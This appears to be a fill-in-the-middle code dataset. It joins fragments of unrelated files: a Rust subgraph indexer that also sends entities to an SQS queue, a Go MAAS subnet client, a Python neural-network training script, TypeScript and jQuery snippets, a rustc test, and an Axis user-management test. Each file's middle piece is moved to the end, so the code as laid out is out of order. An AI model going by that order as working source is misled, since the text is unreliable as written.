let block_stream = match is_firehose {
true => chain.new_firehose_block_stream(
inputs.deployment.clone(),
inputs.store.block_cursor(),
inputs.start_blocks.clone(),
Arc::new(filter.clone()),
block_stream_metrics.clone(),
inputs.unified_api_version.clone(),
),
false => {
let current_ptr = inputs.store.block_ptr();
chain.new_polling_block_stream(
inputs.deployment.clone(),
inputs.start_blocks.clone(),
current_ptr,
Arc::new(filter.clone()),
block_stream_metrics.clone(),
inputs.unified_api_version.clone(),
)
}
}
.await?;
Ok(BufferedBlockStream::spawn_from_stream(
block_stream,
buffer_size,
))
}
pub struct SubgraphRunner<C: Blockchain, T: RuntimeHostBuilder<C>> {
ctx: IndexingContext<T, C>,
inputs: Arc<IndexingInputs<C>>,
}
impl<C, T> SubgraphRunner<C, T>
where
C: Blockchain,
T: RuntimeHostBuilder<C>,
{
pub fn new(inputs: IndexingInputs<C>, ctx: IndexingContext<T, C>) -> Self {
Self {
inputs: Arc::new(inputs),
ctx,
}
}
pub async fn run(mut self) -> Result<(), Error> {
// Clone a few things for different parts of the async processing
let subgraph_metrics = self.ctx.subgraph_metrics.cheap_clone();
let store_for_err = self.inputs.store.cheap_clone();
let logger = self.ctx.state.logger.cheap_clone();
let id_for_err = self.inputs.deployment.hash.clone();
let mut should_try_unfail_deterministic = true;
let mut should_try_unfail_non_deterministic = true;
let mut synced = false;
let mut skip_ptr_updates_timer = Instant::now();
// Exponential backoff that starts with two minutes and keeps
// increasing its timeout exponentially until it reaches the ceiling.
let mut backoff = ExponentialBackoff::new(MINUTE * 2, *SUBGRAPH_ERROR_RETRY_CEIL_SECS);
loop {
debug!(logger, "Starting or restarting subgraph");
let block_stream_canceler = CancelGuard::new();
let block_stream_cancel_handle = block_stream_canceler.handle();
let metrics = self.ctx.block_stream_metrics.clone();
let filter = self.ctx.state.filter.clone();
let stream_inputs = self.inputs.clone();
let mut block_stream = new_block_stream(stream_inputs, filter, metrics.cheap_clone())
.await?
.map_err(CancelableError::Error)
.cancelable(&block_stream_canceler, || Err(CancelableError::Cancel));
let chain = self.inputs.chain.clone();
let chain_store = chain.chain_store();
// Keep the stream's cancel guard around to be able to shut it down
// when the subgraph deployment is unassigned
self.ctx
.state
.instances
.write()
.unwrap()
.insert(self.inputs.deployment.id, block_stream_canceler);
debug!(logger, "Starting block stream");
// Process events from the stream as long as no restart is needed
loop {
let event = {
let _section = metrics.stopwatch.start_section("scan_blocks");
block_stream.next().await
};
let (block, cursor) = match event {
Some(Ok(BlockStreamEvent::ProcessBlock(block, cursor))) => (block, cursor),
Some(Ok(BlockStreamEvent::Revert(subgraph_ptr, parent_ptr, cursor))) => {
info!(
logger,
"Reverting block to get back to main chain";
"block_number" => format!("{}", subgraph_ptr.number),
"block_hash" => format!("{}", subgraph_ptr.hash)
);
if let Err(e) = self
.inputs
.store
.revert_block_operations(parent_ptr, cursor.as_deref())
{
error!(
&logger,
"Could not revert block. Retrying";
"block_number" => format!("{}", subgraph_ptr.number),
"block_hash" => format!("{}", subgraph_ptr.hash),
"error" => e.to_string(),
);
// Exit inner block stream consumption loop and go up to loop that restarts subgraph
break;
}
self.ctx
.block_stream_metrics
.reverted_blocks
.set(subgraph_ptr.number as f64);
// Revert the in-memory state:
// - Remove hosts for reverted dynamic data sources.
// - Clear the entity cache.
//
// Note that we do not currently revert the filters, which means the filters
// will be broader than necessary. This is not ideal for performance, but is not
// incorrect since we will discard triggers that match the filters but do not
// match any data sources.
self.ctx
.state
.instance
.revert_data_sources(subgraph_ptr.number);
self.ctx.state.entity_lfu_cache = LfuCache::new();
continue;
}
// Log and drop the errors from the block_stream
// The block stream will continue attempting to produce blocks
Some(Err(e)) => {
if block_stream_cancel_handle.is_canceled() {
debug!(&logger, "Subgraph block stream shut down cleanly");
return Ok(());
}
debug!(
&logger,
"Block stream produced a non-fatal error";
"error" => format!("{}", e),
);
continue;
}
// Scenario where this can happen: 1504c9d8-36e4-45bb-b4f2-71cf58789ed9
None => unreachable!("The block stream stopped producing blocks"),
};
let block_ptr = block.ptr();
if block.trigger_count() > 0 {
subgraph_metrics
.block_trigger_count
.observe(block.trigger_count() as f64);
}
if block.trigger_count() == 0
&& skip_ptr_updates_timer.elapsed() <= SKIP_PTR_UPDATES_THRESHOLD
&& !synced
{
continue;
} else {
skip_ptr_updates_timer = Instant::now();
}
let start = Instant::now();
let deployment_failed = self.ctx.block_stream_metrics.deployment_failed.clone();
// If a subgraph failed for deterministic reasons, before processing a new block, we
// revert the deployment head. It should lead to the same result since the error was
// deterministic.
//
// As an optimization we check this only on the first run.
if should_try_unfail_deterministic {
should_try_unfail_deterministic = false;
if let Some(current_ptr) = self.inputs.store.block_ptr() {
if let Some(parent_ptr) = self
.inputs
.triggers_adapter
.parent_ptr(¤t_ptr)
.await?
{
// This reverts the deployment head to the parent_ptr if
// deterministic errors happened.
//
// There's no point in calling it if we have no current or parent block
// pointers, because there would be: no block to revert to or to search
// errors from (first execution).
self.inputs
.store
.unfail_deterministic_error(¤t_ptr, &parent_ptr)?;
}
}
}
let res = self
.process_block(
&logger,
self.inputs.triggers_adapter.cheap_clone(),
block_stream_cancel_handle.clone(),
block,
cursor.into(),
)
.await;
let elapsed = start.elapsed().as_secs_f64();
subgraph_metrics.block_processing_duration.observe(elapsed);
match res {
Ok(needs_restart) => {
// Once synced, no need to try to update the status again.
if !synced
&& is_deployment_synced(&block_ptr, chain_store.cached_head_ptr()?)
{
// Updating the sync status is an one way operation.
// This state change exists: not synced -> synced
// This state change does NOT: synced -> not synced
self.inputs.store.deployment_synced()?;
// Stop trying to update the sync status.
synced = true;
// Stop recording time-to-sync metrics.
self.ctx.block_stream_metrics.stopwatch.disable();
}
// Keep trying to unfail subgraph for everytime it advances block(s) until it's
// health is not Failed anymore.
if should_try_unfail_non_deterministic {
// If the deployment head advanced, we can unfail
// the non-deterministic error (if there's any).
self.inputs
.store
.unfail_non_deterministic_error(&block_ptr)?;
match self
.inputs
.store
.health(&self.inputs.deployment.hash)
.await?
{
SubgraphHealth::Failed => {
// If the unfail call didn't change the subgraph health, we keep
// `should_try_unfail_non_deterministic` as `true` until it's
// actually unfailed.
}
SubgraphHealth::Healthy | SubgraphHealth::Unhealthy => {
// Stop trying to unfail.
should_try_unfail_non_deterministic = false;
deployment_failed.set(0.0);
backoff.reset();
}
};
}
if needs_restart {
// Cancel the stream for real
self.ctx
.state
.instances
.write()
.unwrap()
.remove(&self.inputs.deployment.id);
// And restart the subgraph
break;
}
if let Some(stop_block) = &self.inputs.stop_block {
if block_ptr.number >= *stop_block {
info!(&logger, "stop block reached for subgraph");
return Ok(());
}
}
}
Err(BlockProcessingError::Canceled) => {
debug!(&logger, "Subgraph block stream shut down cleanly");
return Ok(());
}
// Handle unexpected stream errors by marking the subgraph as failed.
Err(e) => {
// Clear entity cache when a subgraph fails.
//
// This is done to be safe and sure that there's no state that's
// out of sync from the database.
//
// Without it, POI changes on failure would be kept in the entity cache
// and be transacted incorrectly in the next run.
self.ctx.state.entity_lfu_cache = LfuCache::new();
deployment_failed.set(1.0);
let message = format!("{:#}", e).replace("\n", "\t");
let err = anyhow!("{}, code: {}", message, LogCode::SubgraphSyncingFailure);
let deterministic = e.is_deterministic();
let error = SubgraphError {
subgraph_id: id_for_err.clone(),
message,
block_ptr: Some(block_ptr),
handler: None,
deterministic,
};
match deterministic {
true => {
// Fail subgraph:
// - Change status/health.
// - Save the error to the database.
store_for_err
.fail_subgraph(error)
.await
.context("Failed to set subgraph status to `failed`")?;
return Err(err);
}
false => {
// Shouldn't fail subgraph if it's already failed for non-deterministic
// reasons.
//
// If we don't do this check we would keep adding the same error to the
// database.
let should_fail_subgraph = self
.inputs
.store
.health(&self.inputs.deployment.hash)
.await?
!= SubgraphHealth::Failed;
if should_fail_subgraph {
// Fail subgraph:
// - Change status/health.
// - Save the error to the database.
store_for_err
.fail_subgraph(error)
.await
.context("Failed to set subgraph status to `failed`")?;
}
// Retry logic below:
// Cancel the stream for real.
self.ctx
.state
.instances
.write()
.unwrap()
.remove(&self.inputs.deployment.id);
let message = format!("{:#}", e).replace("\n", "\t");
error!(logger, "Subgraph failed with non-deterministic error: {}", message;
"attempt" => backoff.attempt,
"retry_delay_s" => backoff.delay().as_secs());
// Sleep before restarting.
backoff.sleep_async().await;
should_try_unfail_non_deterministic = true;
// And restart the subgraph.
break;
}
}
}
}
}
}
}
/// Processes a block and returns the updated context and a boolean flag indicating
/// whether new dynamic data sources have been added to the subgraph.
async fn process_block(
&mut self,
logger: &Logger,
triggers_adapter: Arc<C::TriggersAdapter>,
block_stream_cancel_handle: CancelHandle,
block: BlockWithTriggers<C>,
firehose_cursor: Option<String>,
) -> Result<bool, BlockProcessingError> {
let triggers = block.trigger_data;
let block = Arc::new(block.block);
let block_ptr = block.ptr();
let logger = logger.new(o!(
"block_number" => format!("{:?}", block_ptr.number),
"block_hash" => format!("{}", block_ptr.hash)
));
if triggers.len() == 1 {
debug!(&logger, "1 candidate trigger in this block");
} else if triggers.len() > 1 {
debug!(
&logger,
"{} candidate triggers in this block",
triggers.len()
);
}
let metrics = self.ctx.subgraph_metrics.clone();
let proof_of_indexing = if self
.inputs
.store
.clone()
.supports_proof_of_indexing()
.await?
{
Some(Arc::new(AtomicRefCell::new(ProofOfIndexing::new(
block_ptr.number,
))))
} else {
None
};
// There are currently no other causality regions since offchain data is not supported.
let causality_region = CausalityRegion::from_network(self.ctx.state.instance.network());
// Process events one after the other, passing in entity operations
// collected previously to every new event being processed
let mut block_state = match Self::process_triggers(
&logger,
BlockState::new(
self.inputs.store.clone(),
std::mem::take(&mut self.ctx.state.entity_lfu_cache),
),
&proof_of_indexing,
&self.ctx.subgraph_metrics,
&self.ctx.state.instance,
&block,
triggers,
&causality_region,
&self.inputs.debug_fork,
)
.await
{
// Triggers processed with no errors or with only deterministic errors.
Ok(block_state) => block_state,
// Some form of unknown or non-deterministic error ocurred.
Err(MappingError::Unknown(e)) => return Err(BlockProcessingError::Unknown(e)),
Err(MappingError::PossibleReorg(e)) => {
info!(logger,
"Possible reorg detected, retrying";
"error" => format!("{:#}", e),
);
// In case of a possible reorg, we want this function to do nothing and restart the
// block stream so it has a chance to detect the reorg.
//
// The `ctx` is unchanged at this point, except for having cleared the entity cache.
// Losing the cache is a bit annoying but not an issue for correctness.
//
// See also b21fa73b-6453-4340-99fb-1a78ec62efb1.
return Ok(true);
}
};
// If new data sources have been created, restart the subgraph after this block.
// This is necessary to re-create the block stream.
let needs_restart = block_state.has_created_data_sources();
let host_metrics = self.ctx.host_metrics.clone();
let sqs_client = self.ctx.state.sqs_client.clone();
// This loop will:
// 1. Instantiate created data sources.
// 2. Process those data sources for the current block.
// Until no data sources are created or MAX_DATA_SOURCES is hit.
// Note that this algorithm processes data sources spawned on the same block _breadth
// first_ on the tree implied by the parent-child relationship between data sources. Only a
// very contrived subgraph would be able to observe this.
while block_state.has_created_data_sources() {
// Instantiate dynamic data sources, removing them from the block state.
let (data_sources, runtime_hosts) = self.create_dynamic_data_sources(
logger.clone(),
host_metrics.clone(),
block_state.drain_created_data_sources(),
)?;
let filter = C::TriggerFilter::from_data_sources(data_sources.iter());
// Reprocess the triggers from this block that match the new data sources
let block_with_triggers = triggers_adapter
.triggers_in_block(&logger, block.as_ref().clone(), &filter)
.await?;
let triggers = block_with_triggers.trigger_data;
if triggers.len() == 1 {
info!(
&logger,
"1 trigger found in this block for the new data sources"
);
} else if triggers.len() > 1 {
info!(
&logger,
"{} triggers found in this block for the new data sources",
triggers.len()
);
}
// Add entity operations for the new data sources to the block state
// and add runtimes for the data sources to the subgraph instance.
self.persist_dynamic_data_sources(
logger.clone(),
&mut block_state.entity_cache,
data_sources,
);
// Process the triggers in each host in the same order the
// corresponding data sources have been created.
for trigger in triggers {
block_state = SubgraphInstance::<C, T>::process_trigger_in_runtime_hosts(
&logger,
&runtime_hosts,
&block,
&trigger,
block_state,
&proof_of_indexing,
&causality_region,
&self.inputs.debug_fork,
&self.ctx.subgraph_metrics,
)
.await
.map_err(|e| {
// This treats a `PossibleReorg` as an ordinary error which will fail the subgraph.
// This can cause an unnecessary subgraph failure, to fix it we need to figure out a
// way to revert the effect of `create_dynamic_data_sources` so we may return a
// clean context as in b21fa73b-6453-4340-99fb-1a78ec62efb1.
match e {
MappingError::PossibleReorg(e) | MappingError::Unknown(e) => {
BlockProcessingError::Unknown(e)
}
}
})?;
}
}
let has_errors = block_state.has_errors();
let is_non_fatal_errors_active = self
.inputs
.features
.contains(&SubgraphFeature::NonFatalErrors);
// Apply entity operations and advance the stream
// Avoid writing to store if block stream has been canceled
if block_stream_cancel_handle.is_canceled() {
return Err(BlockProcessingError::Canceled);
}
if let Some(proof_of_indexing) = proof_of_indexing {
let proof_of_indexing = Arc::try_unwrap(proof_of_indexing).unwrap().into_inner();
update_proof_of_indexing(
proof_of_indexing,
&self.ctx.host_metrics.stopwatch,
&self.inputs.deployment.hash,
&mut block_state.entity_cache,
)
.await?;
}
let section = self
.ctx
.host_metrics
.stopwatch
.start_section("as_modifications");
let ModificationsAndCache {
modifications: mut mods,
data_sources,
entity_lfu_cache: cache,
} = block_state
.entity_cache
.as_modifications()
.map_err(|e| BlockProcessingError::Unknown(e.into()))?;
section.end();
// Put the cache back in the ctx, asserting that the placeholder cache was not used.
assert!(self.ctx.state.entity_lfu_cache.is_empty());
self.ctx.state.entity_lfu_cache = cache;
if !mods.is_empty() {
info!(&logger, "Applying {} entity operation(s)", mods.len());
}
let err_count = block_state.deterministic_errors.len();
for (i, e) in block_state.deterministic_errors.iter().enumerate() {
let message = format!("{:#}", e).replace("\n", "\t");
error!(&logger, "Subgraph error {}/{}", i + 1, err_count;
"error" => message,
"code" => LogCode::SubgraphSyncingFailure
);
}
// Transact entity operations into the store and update the
// subgraph's block stream pointer
let _section = self
.ctx
.host_metrics
.stopwatch
.start_section("transact_block");
let stopwatch = self.ctx.host_metrics.stopwatch.clone();
let start = Instant::now();
let store = &self.inputs.store;
// If a deterministic error has happened, make the PoI to be the only entity that'll be stored.
if has_errors && !is_non_fatal_errors_active {
let is_poi_entity =
|entity_mod: &EntityModification| entity_mod.entity_key().entity_type.is_poi();
mods.retain(is_poi_entity);
// Confidence check
assert!(
mods.len() == 1,
"There should be only one PoI EntityModification"
);
}
let BlockState {
deterministic_errors,
..
} = block_state;
let first_error = deterministic_errors.first().cloned();
//Sending events to the queue
let mut messages_sent = 0;
let mut messages_failed = 0;
for modification in &mods {
let mut entity = modification.get_entity();
let entity_key = modification.entity_key().clone();
entity.insert(String::from("entity_id"), Value::from(entity_key.entity_id));
let json_entity = serde_json::to_string(&entity).unwrap();
let rsp = &sqs_client
.send_message()
.queue_url("polysynth-test") // This is to read from the graph indices itself
.message_body(&json_entity)
.send().await;
match rsp {
Ok(_) => {
messages_sent += 1;
}
_ => {
messages_failed += 1;
}
}
}
println!("[PolySynth] #Total Success : {}, Failed: {}", messages_sent, messages_failed);
match store.transact_block_operations(
block_ptr,
firehose_cursor,
mods,
stopwatch,
data_sources,
deterministic_errors,
) {
Ok(_) => {
// For subgraphs with `nonFatalErrors` feature disabled, we consider
// any error as fatal.
//
// So we do an early return to make the subgraph stop processing blocks.
//
// In this scenario the only entity that is stored/transacted is the PoI,
// all of the others are discarded.
if has_errors && !is_non_fatal_errors_active {
// Only the first error is reported.
return Err(BlockProcessingError::Deterministic(first_error.unwrap()));
}
let elapsed = start.elapsed().as_secs_f64();
metrics.block_ops_transaction_duration.observe(elapsed);
// To prevent a buggy pending version from replacing a current version, if errors are
// present the subgraph will be unassigned.
if has_errors && !*DISABLE_FAIL_FAST && !store.is_deployment_synced().await? {
store
.unassign_subgraph()
.map_err(|e| BlockProcessingError::Unknown(e.into()))?;
// Use `Canceled` to avoiding setting the subgraph health to failed, an error was
// just transacted so it will be already be set to unhealthy.
return Err(BlockProcessingError::Canceled);
}
Ok(needs_restart)
}
Err(e) => {
Err(anyhow!("Error while processing block stream for a subgraph: {}", e).into())
}
}
}
async fn process_triggers(
logger: &Logger,
mut block_state: BlockState<C>,
proof_of_indexing: &SharedProofOfIndexing,
subgraph_metrics: &Arc<SubgraphInstanceMetrics>,
instance: &SubgraphInstance<C, impl RuntimeHostBuilder<C>>,
block: &Arc<C::Block>,
triggers: Vec<C::TriggerData>,
causality_region: &str,
debug_fork: &Option<Arc<dyn SubgraphFork>>,
) -> Result<BlockState<C>, MappingError> {
use graph::blockchain::TriggerData;
for trigger in triggers {
block_state = instance
.process_trigger(
&logger,
block,
&trigger,
block_state,
proof_of_indexing,
causality_region,
debug_fork,
subgraph_metrics,
)
.await
.map_err(move |mut e| {
let error_context = trigger.error_context();
if !error_context.is_empty() {
e = e.context(error_context);
}
e.context("failed to process trigger".to_string())
})?;
}
Ok(block_state)
}
fn create_dynamic_data_sources(
&mut self,
logger: Logger,
host_metrics: Arc<HostMetrics>,
created_data_sources: Vec<DataSourceTemplateInfo<C>>,
) -> Result<(Vec<C::DataSource>, Vec<Arc<T::Host>>), Error> {
let mut data_sources = vec![];
let mut runtime_hosts = vec![];
for info in created_data_sources {
// Try to instantiate a data source from the template
let data_source = C::DataSource::try_from(info)?;
// Try to create a runtime host for the data source
let host = self.ctx.state.instance.add_dynamic_data_source(
&logger,
data_source.clone(),
self.inputs.templates.clone(),
host_metrics.clone(),
)?;
match host {
Some(host) => {
data_sources.push(data_source);
runtime_hosts.push(host);
}
None => {
fail_point!("error_on_duplicate_ds", |_| Err(anyhow!("duplicate ds")));
warn!(
logger,
"no runtime hosted created, there is already a runtime host instantiated for \
this data source";
"name" => &data_source.name(),
"address" => &data_source.address()
.map(|address| hex::encode(address))
.unwrap_or("none".to_string()),
)
}
}
}
Ok((data_sources, runtime_hosts))
}
fn persist_dynamic_data_sources(
&mut self,
logger: Logger,
entity_cache: &mut EntityCache,
data_sources: Vec<C::DataSource>,
) {
if !data_sources.is_empty() {
debug!(
logger,
"Creating {} dynamic data source(s)",
data_sources.len()
);
}
// Add entity operations to the block state in order to persist
// the dynamic data sources
for data_source in data_sources.iter() {
debug!(
logger,
"Persisting data_source";
"name" => &data_source.name(),
"address" => &data_source.address().map(|address| hex::encode(address)).unwrap_or("none".to_string()),
);
entity_cache.add_data_source(data_source);
}
// Merge filters from data sources into the block stream builder
self.ctx.state.filter.extend(data_sources.iter());
}
}
/// Transform the proof of indexing changes into entity updates that will be
/// inserted when as_modifications is called.
async fn update_proof_of_indexing(
proof_of_indexing: ProofOfIndexing,
stopwatch: &StopwatchMetrics,
deployment_id: &DeploymentHash,
entity_cache: &mut EntityCache,
) -> Result<(), Error> |
/// Checks if the Deployment BlockPtr is at least one block behind to the chain head.
fn is_deployment_synced(deployment_head_ptr: &BlockPtr, chain_head_ptr: Option<BlockPtr>) -> bool {
matches!((deployment_head_ptr, &chain_head_ptr), (b1, Some(b2)) if b1.number >= (b2.number - 1))
}
#[test]
fn test_is_deployment_synced() {
let block_0 = BlockPtr::try_from((
"bd34884280958002c51d3f7b5f853e6febeba33de0f40d15b0363006533c924f",
0,
))
.unwrap();
let block_1 = BlockPtr::try_from((
"8511fa04b64657581e3f00e14543c1d522d5d7e771b54aa3060b662ade47da13",
1,
))
.unwrap();
let block_2 = BlockPtr::try_from((
"b98fb783b49de5652097a989414c767824dff7e7fd765a63b493772511db81c1",
2,
))
.unwrap();
assert!(!is_deployment_synced(&block_0, None));
assert!(!is_deployment_synced(&block_2, None));
assert!(!is_deployment_synced(&block_0, Some(block_2.clone())));
assert!(is_deployment_synced(&block_1, Some(block_2.clone())));
assert!(is_deployment_synced(&block_2, Some(block_2.clone())));
}
| {
let _section_guard = stopwatch.start_section("update_proof_of_indexing");
let mut proof_of_indexing = proof_of_indexing.take();
for (causality_region, stream) in proof_of_indexing.drain() {
// Create the special POI entity key specific to this causality_region
let entity_key = EntityKey {
subgraph_id: deployment_id.clone(),
entity_type: POI_OBJECT.to_owned(),
entity_id: causality_region,
};
// Grab the current digest attribute on this entity
let prev_poi =
entity_cache
.get(&entity_key)
.map_err(Error::from)?
.map(|entity| match entity.get("digest") {
Some(Value::Bytes(b)) => b.clone(),
_ => panic!("Expected POI entity to have a digest and for it to be bytes"),
});
// Finish the POI stream, getting the new POI value.
let updated_proof_of_indexing = stream.pause(prev_poi.as_deref());
let updated_proof_of_indexing: Bytes = (&updated_proof_of_indexing[..]).into();
// Put this onto an entity with the same digest attribute
// that was expected before when reading.
let new_poi_entity = entity! {
id: entity_key.entity_id.clone(),
digest: updated_proof_of_indexing,
};
entity_cache.set(entity_key, new_poi_entity)?;
}
Ok(())
} |
subnet.go | package client
import (
"encoding/json"
"fmt"
"log"
"net/url"
"github.com/google/go-querystring/query"
"github.com/ionutbalutoiu/gomaasclient/entity"
"github.com/ionutbalutoiu/gomaasclient/entity/subnet"
)
type Subnet struct {
ApiClient ApiClient
}
func (s *Subnet) client(id int) ApiClient {
return s.ApiClient.GetSubObject("subnets").GetSubObject(fmt.Sprintf("%v", id))
}
func (s *Subnet) Delete(id int) error {
return s.client(id).Delete()
}
func (s *Subnet) Get(id int) (subnet *entity.Subnet, err error) {
subnet = new(entity.Subnet)
err = s.client(id).Get("", url.Values{}, func(data []byte) error {
return json.Unmarshal(data, &subnet)
})
return
}
func (s *Subnet) GetIPAddresses(id int) (subnetIPAddresses []subnet.IPAddress, err error) {
qsp := url.Values{}
qsp.Set("with_username", "1")
qsp.Set("with_summary", "1")
err = s.client(id).Get("ip_addresses", qsp, func(data []byte) error {
return json.Unmarshal(data, &subnetIPAddresses)
})
return
}
func (s *Subnet) GetReservedIPRanges(id int) (subnetReservedIPRanges []subnet.ReservedIPRange, err error) {
err = s.client(id).Get("reserved_ip_ranges", url.Values{}, func(data []byte) error {
return json.Unmarshal(data, &subnetReservedIPRanges)
})
return
}
func (s *Subnet) GetStatistics(id int) (stats *subnet.Statistics, err error) {
stats = new(subnet.Statistics)
err = s.client(id).Get("statistics", url.Values{}, func(data []byte) error {
return json.Unmarshal(data, stats)
})
return
}
func (s *Subnet) GetUnreservedIPRanges(id int) (ipRanges []subnet.IPRange, err error) {
err = s.client(id).Get("unreserved_ip_ranges", url.Values{}, func(data []byte) error {
log.Printf("%s\n", data)
return json.Unmarshal(data, &ipRanges)
})
return
}
func (s *Subnet) Update(id int, params *entity.SubnetParams) (subnet *entity.Subnet, err error) { | }
subnet = new(entity.Subnet)
err = s.client(id).Put(qsp, func(data []byte) error {
return json.Unmarshal(data, subnet)
})
return
} | qsp, err := query.Values(params)
if err != nil {
return |
vertical.py | import matplotlib.pyplot as plt
import nnfs
from nnfs.datasets import vertical_data
nnfs.init()
X, y = vertical_data(samples=100, classes=3)
plt.scatter(X[:, 0], X[:, 1], c=y, s=40, cmap='brg')
plt.show()
import numpy as np
import nnfs
import matplotlib.pyplot as plt
nnfs.init()
class Layer_Dense:
def __init__(self, n_inputs, n_neurons):
self.weights = 0.01 * np.random.randn(n_inputs, n_neurons)
self.biases = np.zeros((1,n_neurons))
def forward(self, inputs):
self.output = np.dot(inputs, self.weights) + self.biases
class Activation_ReLU:
# Forward Pass
def forward(self, inputs):
self.output = np.maximum(0,inputs)
class Activation_Softmax:
def forward(self, inputs):
exp_values= np.exp(inputs - np.max(inputs, axis=1, keepdims=True))
normalized = exp_values / np.sum(exp_values, axis=1, keepdims=True)
self.output = normalized
class Loss:
# Calculates the data and regularization losses
# given model output and ground truth values
def calculate(self, output, y):
# Calculate sample losses
sample_losses = self.forward(output, y)
# Calculate mean loss
data_loss = np.mean(sample_losses)
# Return loss
return data_loss
class Loss_CatagoricalCrossEntropy(Loss):
def | (self, y_pred, y_true):
# Number of Samples
samples = len(y_pred)
# Clip Data to prevent div by 0
# Clip Both sides to not drag the mean torwards any value
y_pred_clipped = np.clip(y_pred, 1e-7, 1-1e-7)
# Probabilities for target values -
# Only if categorical labels
if len(y_true.shape) == 1:
correct_confidences = y_pred_clipped[range(samples), y_true]
# Mask Values - only for one-hot encoded labels
elif len(y_true.shape) == 2:
correct_confidences = np.sum(y_pred_clipped * y_true, axis=1)
negative_log_likelyhoods = -np.log(correct_confidences)
return negative_log_likelyhoods
# Model
dense1 = Layer_Dense(2,3)
activation1 = Activation_ReLU()
dense2 = Layer_Dense(3, 3)
activation2 = Activation_Softmax()
loss_function = Loss_CatagoricalCrossEntropy()
# Helper variables
lowest_loss = 9999999 # some initial value
best_dense1_weights = dense1.weights.copy()
best_dense1_biases = dense1.biases.copy()
best_dense2_weights = dense2.weights.copy()
best_dense2_biases = dense2.biases.copy()
for iteration in range(10000):
# Generate a new set of weights for iteration
dense1.weights += 0.05 * np.random.randn(2, 3)
dense1.biases += 0.05 * np.random.randn(1, 3)
dense2.weights += 0.05 * np.random.randn(3, 3)
dense2.biases += 0.05 * np.random.randn(1, 3)
# Perform a forward pass of the training data through this layer
dense1.forward(X)
activation1.forward(dense1.output)
dense2.forward(activation1.output)
activation2.forward(dense2.output)
# Perform a forward pass through activation function
# it takes the output of second dense layer here and returns loss
loss = loss_function.calculate(activation2.output, y)
# Calculate accuracy from output of activation2 and targets
# calculate values along first axis
predictions = np.argmax(activation2.output, axis=1)
accuracy = np.mean(predictions==y)
# If loss is smaller - print and save weights and biases aside
if loss < lowest_loss:
print('New set of weights found, iteration:', iteration,
'loss:', loss, 'acc:', accuracy)
best_dense1_weights = dense1.weights.copy()
best_dense1_biases = dense1.biases.copy()
best_dense2_weights = dense2.weights.copy()
best_dense2_biases = dense2.biases.copy()
lowest_loss = loss
# Revert weights and biases
else:
dense1.weights = best_dense1_weights.copy()
dense1.biases = best_dense1_biases.copy()
dense2.weights = best_dense2_weights.copy()
dense2.biases = best_dense2_biases.copy() | forward |
index.ts | export * from './DividerMenuItem';
export * from './SelectorMenuItem';
export * from './TextMenuItem'; | ||
admin-contenttypes.js | (function($) {
$(function() {
$("#search-box").focus().on("keyup", function (e) {
var text = $(this).val();
if (e.keyCode == 13) {
var visibleRows = $("[data-record-text]:visible");
if (visibleRows.length > 0) { | var primaryButton = $("#layout-main .manage .primaryAction");
location.href = primaryButton.attr("href") + "?suggestion=" + text;
}
return;
}
if (text == "") {
$("[data-record-text]").show();
} else {
var lowerCaseText = text.toLowerCase();
$("[data-record-text]").each(function() {
var recordText = $(this).data("record-text").toLowerCase();
$(this).toggle(recordText.indexOf(lowerCaseText) >= 0);
});
}
});
$("#layout-main .manage .primaryAction").on("click", function(e) {
var suggestion = $("#search-box").val();
if (suggestion.length == 0) {
return;
}
location.href = $(this).attr("href") + "?suggestion=" + suggestion;
e.preventDefault();
});
});
})(jQuery); | var editLink = $(".related a:last", visibleRows[0]);
location.href = editLink.attr("href");
} else { |
hr-associated-type-bound-param-2.rs | trait Z<'a, T: ?Sized>
where
T: Z<'a, u16>,
//~^ the trait bound `str: Clone` is not satisfied
//~| the trait bound `str: Clone` is not satisfied
for<'b> <T as Z<'b, u16>>::W: Clone,
{
type W: ?Sized;
fn h(&self, x: &T::W) |
}
impl<'a> Z<'a, u16> for u16 {
type W = str;
//~^ ERROR the trait bound `str: Clone
}
fn main() {
1u16.h("abc");
}
| {
<T::W>::clone(x);
} |
test_pwdgrp_cgi.py | """Test Axis user management.
pytest --cov-report term-missing --cov=axis.pwdgrp_cgi tests/test_pwdgrp_cgi.py
"""
import pytest
from unittest.mock import Mock
from axis.pwdgrp_cgi import SGRP_ADMIN, User, Users
def test_users():
"""Verify that you can list users."""
mock_request = Mock()
users = Users(fixture, mock_request)
assert users['userv']
assert users['userv'].name == 'userv'
assert users['userv'].viewer
assert not users['userv'].operator
assert not users['userv'].admin
assert not users['userv'].ptz
assert users['usero']
assert users['usero'].name == 'usero'
assert users['usero'].viewer
assert users['usero'].operator
assert not users['usero'].admin
assert not users['usero'].ptz
assert users['usera']
assert users['usera'].name == 'usera'
assert users['usera'].viewer
assert users['usera'].operator
assert users['usera'].admin
assert users['usera'].ptz
def test_create():
"""Verify that you can create users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin'
})
users.create('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'add',
'user': 'joe',
'pwd': 'abcd',
'grp': 'users',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_modify():
"""Verify that you can modify users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.modify('joe', pwd='abcd')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd'
})
users.modify('joe', sgrp=SGRP_ADMIN)
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'sgrp': 'viewer:operator:admin'
})
users.modify('joe', comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'comment': 'comment'
})
users.modify('joe', pwd='abcd', sgrp=SGRP_ADMIN, comment='comment')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'update',
'user': 'joe',
'pwd': 'abcd',
'sgrp': 'viewer:operator:admin',
'comment': 'comment'
})
def test_delete():
"""Verify that you can delete users."""
mock_request = Mock()
users = Users(fixture, mock_request)
users.delete('joe')
mock_request.assert_called_with(
'post', '/axis-cgi/pwdgrp.cgi',
data={
'action': 'remove',
'user': 'joe'
})
fixture = """admin="usera,wwwa,wwwaop,wwwaovp,wwwao,wwwap,wwwaov,root"
anonymous=""
